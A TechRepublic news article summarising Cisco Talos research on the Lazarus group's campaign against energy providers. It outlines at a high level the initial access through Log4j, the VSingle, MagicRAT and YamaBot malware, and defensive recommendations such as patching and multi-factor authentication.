Register for your free TechRepublic membership or if you are already a member, sign in using your preferred method below.
We recently updated our Terms and Conditions for TechRepublic Premium. By clicking continue, you agree to these updated terms.
Invalid email/username and password combination supplied.
An email has been sent to you with instructions on how to reset your password.
By registering, you agree to the Terms of Use and acknowledge the data practices outlined in the Privacy Policy.
You will also receive a complimentary subscription to TechRepublic's News and Special Offers newsletter and the Top Story of the Day newsletter. You may unsubscribe from these newsletters at any time.
All fields are required. Username must be unique. Password must be a minimum of 6 characters and have any 3 of the 4 items: a number (0 through 9), a special character (such as !, $, #, %), an uppercase character (A through Z) or a lowercase (a through z) character (no spaces).
North Korean cyberespionage actor Lazarus targets energy providers with new malware
Your email has been sent
Lazarus, a North Korean cyberespionage group, keeps hitting energy providers in the U.S., Canada and Japan with a new malware arsenal.
Lazarus, also known as Hidden Cobra or Zinc, is a known nation-state cyberespionage threat actor originating from North Korea, according to the U.S. government. The threat actor has been active since 2009 and has often switched targets through time, probably according to nation-state interests.
Between 2020 and 2021, Lazarus compromised defense companies in more than a dozen countries including the U.S. It also targeted selected entities to assist strategic sectors such as aerospace and military equipment.
The threat actor is now aiming at energy providers, according to a new report from Cisco Talos.
SEE: Mobile device security policy (TechRepublic Premium)
Lazarus often uses very similar techniques from one attack to the other, as exposed by Talos (Figure A).
In the campaign reported by Talos, the initial vector of infection is the exploitation of the Log4j vulnerability on internet-facing VMware Horizon servers.
Once the targeted system is compromised, Lazarus downloads its toolkit from a web server it controls.
Talos has witnessed three variants of the attack. Each variant consists of another malware deployment. Lazarus could use only VSingle, VSingle and MagicRAT, or a new malware dubbed YamaBot.
Variations in the attack also imply using other tools such as mimikatz for credential harvesting, proxy tools to set up SOCKs proxies, or reverse tunneling tools such as Plink.
Lazarus also checks for installed antivirus on endpoints and disables Windows Defender antivirus.
The attackers also copy parts of Windows Registry Hives, for offline analysis and possible exploitation of credentials and policy information, and gather information from the Active Directory before creating their own high-privileged users. These users would be removed once the attack is fully in place, in addition to removing temporary tools and cleaning Windows Event logs.
At this point, the attackers then take their time to explore the systems, listing multiple folders and putting those of particular interest, mostly proprietary intellectual property, into a RAR archive file for exfiltration. The exfiltration is done via one of the malware used in the attack.
SEE: Protect your business from cybercrime with this dark web monitoring service (TechRepublic Academy)
Lazarus is a state-sponsored cyberespionage threat actor that has the capability to develop and distribute its own malware families. Lazarus has created several malware, which it uses for its operations. Three different malware are used in the current attack campaign exposed by Talos, dubbed VSingle, YamaBot and MagicRAT.
VSingle is a persistent backdoor used by the threat actor to run different activities, such as reconnaissance, exfiltration and manual backdooring. It is a basic stager, enabling attackers to deploy more malware or to open a reverse shell that connects to a C2 server controlled by the attackers, which allows them to execute commands via cmd.exe.
Using VSingle, Lazarus typically runs commands on infected computers to collect information about the system and its network. All this information is mandatory for lateral movement activities, in which attackers can plant more malware on other systems or find information to exfiltrate later.
Lazarus has also used VSingle to force the system to cache users credentials, so it is possible to collect them afterward. The threat actor has also used it to get administrator privileges on users added to the system. This way, if the malware is fully removed, attackers still might access the network via Remote Desktop Protocol (RDP).
Lazarus makes use of two additional software when using VSingle: a utility called Plink, which enables the creation of encrypted tunnels between systems via the Secure Shell (SSH) protocol, and another tool named 3proxy, a small proxy server available publicly.
MagicRAT is the newest malware developed by the Lazarus team, according to Talos. It is a persistent malware developed in C++ programming language. Interestingly, it uses the Qt framework, which is a programming library used for graphical interfaces. Since the RAT has no graphical interface, it is believed the use of the Qt framework is to increase the complexity of the malware analysis.
Once running, the malware provides its C2 server with basic information about the system and its environment. It also provides the attacker with a remote shell and a few other features such as an automatic deletion of the malware or a sleep function to try to avoid being detected.
In some Lazarus group attacks, MagicRAT has deployed the VSingle malware.
During one particular attack, Lazarus group deployed YamaBot after several attempts to deploy the VSingle malware. YamaBot is written in the Go programming language, and just like its peers, it starts by collecting basic information about the system.
YamaBot provides the capability to browse through folders and list files, download and execute files or arbitrary commands on the infected computer, or send back information about processes running on the machine.
While Talos does not disclose much about the actual targets of this attack campaign, the researchers mention that “Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
Lazarus group makes heavy use of common vulnerabilities to compromise companies. In the current operation, it leveraged the Log4j vulnerability in order to gain an initial foothold on networks. Therefore, it is strongly advised to keep operating systems and all software up to date and patched to avoid such vulnerability exploitation.
It is also advised to monitor all connections to RDP or VPN services coming from outside of the company, since attackers sometimes impersonate employees by using their credentials to log in the system. For this reason, it is also advised to deploy multi-factor authentication (MFA), so an attacker cannot simply use valid credentials to log in systems.
Finally, security solutions need to be deployed and customized in order to detect malware and potential misuse of legitimate tools such as Plink.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
Strengthen your organization's IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices.
North Korean cyberespionage actor Lazarus targets energy providers with new malware
Your email has been sent
Your message has been sent
TechRepublic Premium content helps you solve your toughest IT issues and jump-start your career or next project.
The technologies could enable immersive experiences, accelerated AI automation and optimized technologist delivery in the next two to 10 years, according to the firm.
Are you an IT manager or executive trying to make the case for a new ERP vendor? Compare the top ERP software solutions with our list today.
Learn about the new features available with macOS 13 and how to download and install the latest version of Apple’s flagship operating system.
Get great deals on developer and Linux training courses, Microsoft Office licenses and more through these TechRepublic Academy offerings.
This comprehensive guide covers the use of services from multiple cloud vendors, including the benefits businesses gain and the challenges IT teams face when using multicloud.
Recruiting a Scrum Master with the right combination of technical expertise and experience will require a comprehensive screening process. This hiring kit provides a customizable framework your business can use to find, recruit and ultimately hire the right person for the job. This hiring kit from TechRepublic Premium includes a job description, sample interview questions ...
Knowing the terminology associated with Web 3.0 is going to be vital to every IT administrator, developer, network engineer, manager and decision maker in business. This quick glossary will introduce and explain concepts and terms vital to understanding Web 3.0 and the technology that drives and supports it.
While the perfect color palette or the most sublime button shading or myriad of other design features play an important role in any product’s success, user interface design is not enough. Customer engagement and retention requires a strategic plan that attempts to measure, quantify and ultimately create a complete satisfying user experience on both an ...
IIoT software assists manufacturers and other industrial operations with configuring, managing and monitoring connected devices. A good IoT solution requires capabilities ranging from designing and delivering connected products to collecting and analyzing system data once in the field. Each IIoT use case has its own diverse set of requirements, but there are key capabilities and ...